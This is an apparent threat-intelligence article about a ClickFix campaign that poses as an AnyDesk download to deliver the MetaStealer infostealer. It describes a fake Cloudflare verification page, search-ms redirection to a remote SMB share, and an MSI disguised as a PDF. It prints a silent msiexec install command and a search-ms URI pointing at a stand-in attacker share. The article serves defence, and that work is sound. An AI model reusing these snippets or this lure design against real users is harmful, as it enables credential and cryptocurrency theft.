A sophisticated variant of the ClickFix attack has surfaced, masquerading as a legitimate AnyDesk installer to disseminate the MetaStealer infostealer. This campaign employs a counterfeit Cloudflare Turnstile verification page to deceive users into executing a specially crafted Windows protocol handler, ultimately delivering a malicious MSI package camouflaged as a PDF document.
As organizations bolster their defenses against conventional social engineering tactics, cybercriminals are adapting by integrating familiar lures with unexpected system components to circumvent detection and exfiltrate sensitive credentials.
Deceptive Landing Page and Initial Lure
In early August, individuals searching for the AnyDesk remote access tool encountered a fraudulent landing page at anydeesk[.]ink/download/anydesk.html. This page presented what appeared to be a standard Cloudflare Turnstile prompt, complete with a verify you are human button.
Upon clicking this button, victims were not directed to paste a command into the Run dialog box, as seen in traditional ClickFix attacks. Instead, they were redirected into Windows File Explorer via the search-ms URI handler. This subtle shift in the redirection mechanism exploits the lesser-monitored Windows Search protocol, catching security teams off-guard.
Infection Chain and Payload Delivery
The attack sequence unfolds when the search-ms URI invokes a remote SMB share, delivering a Windows shortcut file named Readme Anydesk.pdf.lnk to the victim’s system. Unlike previous ClickFix variants that rely on clipboard-pasted PowerShell commands, this attack automatically launches the LNK payload. This payload executes a script to download and install two components:
1. The genuine AnyDesk installer, hosted on Microsoft Edge to maintain plausibility.
2. A decoy PDF served from chat1[.]store.
The decoy file is, in reality, an MSI package that dynamically incorporates the victim’s hostname into its download URL by leveraging the %COMPUTERNAME% environment variable. Once downloaded, the MSI is installed using the following command:
“`shell
msiexec /i %TEMP%\%%COMPUTERNAME%%.msi /quiet
“`
After installation, metadata reveals two primary artifacts:
1. A CustomActionDLL responsible for orchestrating the setup.
2. A CAB archive containing ls26.exe (the MetaStealer dropper) and cleanup scripts.
Technical Analysis of MetaStealer
The ls26.exe file is protected with Private EXE Protector and exhibits characteristic behaviors of MetaStealer, including:
– Credential harvesting from browsers.
– Theft of cryptocurrency wallet information.
By abusing legitimate Windows protocols and file handling mechanisms, this attack evades sandbox detection and security alerts until the final payload executes its malicious logic.
Exploitation of Windows Search Protocol
Central to this campaign is the innovative use of Windows Search. By invoking the search-ms URI protocol, attackers bypass the Run dialog restrictions in hardened environments and introduce payloads directly through File Explorer. The following URI snippet illustrates the redirection:
“`shell
search-ms:displayname=AnyDesk%20Secure%20Access;crumb=location:\\attacker-smb\share
“`
Once the user confirms the File Explorer prompt, the LNK file silently executes the download routines. The MSI’s CustomActionDLL then triggers the retrieval of Binary.bz.WrappedSetupProgram, which unpacks ls26.exe and 1.js. The JavaScript file ensures the removal of intermediary files, while ls26.exe initiates the data exfiltration phase.
Implications and Recommendations
This emerging tactic underscores the importance of monitoring unconventional extensions of trusted system features. Defenders should consider implementing strict protocol handler policies, SMB auditing, and contextual analysis of MSI installations to detect and disrupt these sophisticated social engineering campaigns.
